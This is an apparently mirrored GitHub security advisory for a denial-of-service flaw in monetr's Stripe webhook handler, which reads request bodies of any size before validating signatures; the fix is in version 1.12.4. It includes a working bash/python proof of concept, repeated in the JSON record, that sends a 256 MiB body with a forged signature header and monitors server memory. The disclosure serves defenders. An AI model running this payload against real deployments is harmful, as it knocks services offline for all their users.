GHSA-V7XQ-3WX6-FQC2

Vulnerability from github – Published: 2026-04-14 00:03 – Updated: 2026-04-15 21:00
VLAI?
Summary
In monetr, unauthenticated Stripe webhook reads attacker-sized request bodies before signature validation
Details

Summary

The public Stripe webhook endpoint fully reads the request body into memory before validating the Stripe signature. A remote unauthenticated attacker can send oversized POST bodies and cause substantial memory growth, leading to denial of service.

Details

When Stripe webhooks are enabled, the Stripe webhook route is reachable without authentication. The handler only requires that a Stripe-Signature header be present, then buffers the entire request body in memory and only afterward attempts Stripe signature verification.

Because body buffering happens before signature validation, memory consumption is controlled by the attacker-supplied payload size even when the signature is invalid. Large requests or repeated requests can exhaust available memory and make the service unresponsive or crash.

This issue depends on Stripe webhooks being enabled. If an upstream proxy or load balancer already enforces a strict request-body limit smaller than the attacker payload, exploitability is reduced accordingly.

PoC

URL="http://127.0.0.1:4000/api/stripe/webhook"
PROC_NAME="monetr"
TOTAL_KIB="$(awk '/MemTotal:/ {print $2}' /proc/meminfo)"

python3 - <<'PY' | curl -s -o /dev/null \
  --limit-rate 10m \
  -H 'Stripe-Signature: t=1,v1=deadbeef' \
  --data-binary @- \
  "$URL" &
import sys
sys.stdout.buffer.write(b"A" * (256 * 1024 * 1024))
PY
REQ_PID=$!

while kill -0 "$REQ_PID" 2>/dev/null; do
  ps -C "$PROC_NAME" -o rss=,%cpu= | awk -v total="$TOTAL_KIB" '
    {
      printf "%s mem=%.2fMiB / %.3fGiB cpu=%s%%\n", "'"$PROC_NAME"'", $1/1024, total/1024/1024, $2
    }
  '
  sleep 1
done

wait "$REQ_PID"
# monetr mem rises substantially while processing the invalid webhook body before signature validation fails

Impact

  • Type: Denial of service / uncontrolled resource consumption (CWE-400)
  • Who is impacted: Internet-reachable monetr deployments that have both Stripe billing and Stripe webhooks enabled (Stripe.Enabled and Stripe.WebhooksEnabled). In practice this is the hosted/SaaS configuration. Self-hosted instances are very unlikely to be affected, because Stripe billing is opt-in, is not part of a typical self-hosted setup, and the webhook route short-circuits to 404 when it is not enabled; meaning the unbounded read is unreachable on a default self-hosted deployment.
  • Security impact: A remote, unauthenticated attacker can cause the monetr server process to buffer attacker-controlled payloads into memory before any signature validation occurs. Sufficiently large or repeated requests can drive memory consumption high enough to make the API unresponsive or crash the process, denying service to all legitimate users of the affected instance — not just users of the billing surface.
  • Attack preconditions: The attacker must be able to reach the /api/stripe/webhook endpoint over the network and the target instance must have Stripe webhooks enabled. No authentication, prior account, user interaction, or knowledge of the Stripe webhook secret is required. Exploitability is reduced (and may be effectively eliminated) on deployments where an upstream proxy or load balancer enforces a request-body size limit smaller than the attacker's payload.
Severity ?
8.2 (High)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.12.3"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/monetr/monetr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.12.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40481"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T00:03:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe public Stripe webhook endpoint fully reads the request body into memory before validating the Stripe signature. A remote unauthenticated attacker can send oversized POST bodies and cause substantial memory growth, leading to denial of service.\n\n### Details\n\nWhen Stripe webhooks are enabled, the Stripe webhook route is reachable without authentication. The handler only requires that a `Stripe-Signature` header be present, then buffers the entire request body in memory and only afterward attempts Stripe signature verification.\n\nBecause body buffering happens before signature validation, memory consumption is controlled by the attacker-supplied payload size even when the signature is invalid. Large requests or repeated requests can exhaust available memory and make the service unresponsive or crash.\n\nThis issue depends on Stripe webhooks being enabled. If an upstream proxy or load balancer already enforces a strict request-body limit smaller than the attacker payload, exploitability is reduced accordingly.\n\n### PoC\n\n```bash\nURL=\"http://127.0.0.1:4000/api/stripe/webhook\"\nPROC_NAME=\"monetr\"\nTOTAL_KIB=\"$(awk \u0027/MemTotal:/ {print $2}\u0027 /proc/meminfo)\"\n\npython3 - \u003c\u003c\u0027PY\u0027 | curl -s -o /dev/null \\\n  --limit-rate 10m \\\n  -H \u0027Stripe-Signature: t=1,v1=deadbeef\u0027 \\\n  --data-binary @- \\\n  \"$URL\" \u0026\nimport sys\nsys.stdout.buffer.write(b\"A\" * (256 * 1024 * 1024))\nPY\nREQ_PID=$!\n\nwhile kill -0 \"$REQ_PID\" 2\u003e/dev/null; do\n  ps -C \"$PROC_NAME\" -o rss=,%cpu= | awk -v total=\"$TOTAL_KIB\" \u0027\n    {\n      printf \"%s mem=%.2fMiB / %.3fGiB cpu=%s%%\\n\", \"\u0027\"$PROC_NAME\"\u0027\", $1/1024, total/1024/1024, $2\n    }\n  \u0027\n  sleep 1\ndone\n\nwait \"$REQ_PID\"\n# monetr mem rises substantially while processing the invalid webhook body before signature validation fails\n```\n\n### Impact\n\n- Type: Denial of service / uncontrolled resource consumption (CWE-400)\n- Who is impacted: Internet-reachable monetr deployments that have both Stripe billing and Stripe webhooks enabled\n  (Stripe.Enabled and Stripe.WebhooksEnabled). In practice this is the hosted/SaaS configuration. Self-hosted instances\n  are very unlikely to be affected, because Stripe billing is opt-in, is not part of a typical self-hosted setup, and\n  the webhook route short-circuits to 404 when it is not enabled; meaning the unbounded read is unreachable on a default\n  self-hosted deployment.\n- Security impact: A remote, unauthenticated attacker can cause the monetr server process to buffer attacker-controlled\n  payloads into memory before any signature validation occurs. Sufficiently large or repeated requests can drive memory\n  consumption high enough to make the API unresponsive or crash the process, denying service to all legitimate users of\n  the affected instance \u2014 not just users of the billing surface.\n- Attack preconditions: The attacker must be able to reach the /api/stripe/webhook endpoint over the network and the\n  target instance must have Stripe webhooks enabled. No authentication, prior account, user interaction, or knowledge of\n  the Stripe webhook secret is required. Exploitability is reduced (and may be effectively eliminated) on deployments\n  where an upstream proxy or load balancer enforces a request-body size limit smaller than the attacker\u0027s payload.",
  "id": "GHSA-v7xq-3wx6-fqc2",
  "modified": "2026-04-15T21:00:49Z",
  "published": "2026-04-14T00:03:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/monetr/monetr/security/advisories/GHSA-v7xq-3wx6-fqc2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/monetr/monetr"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "In monetr, unauthenticated Stripe webhook reads attacker-sized request bodies before signature validation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.